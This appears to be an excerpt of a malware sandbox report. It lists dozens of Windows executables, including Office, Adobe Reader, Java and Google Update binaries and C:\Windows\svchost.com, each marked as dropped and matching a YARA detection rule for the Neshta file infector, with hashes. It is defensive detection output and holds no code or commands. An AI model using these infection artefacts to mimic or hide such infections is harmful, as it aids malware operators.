                          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Windows\svchost.com, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
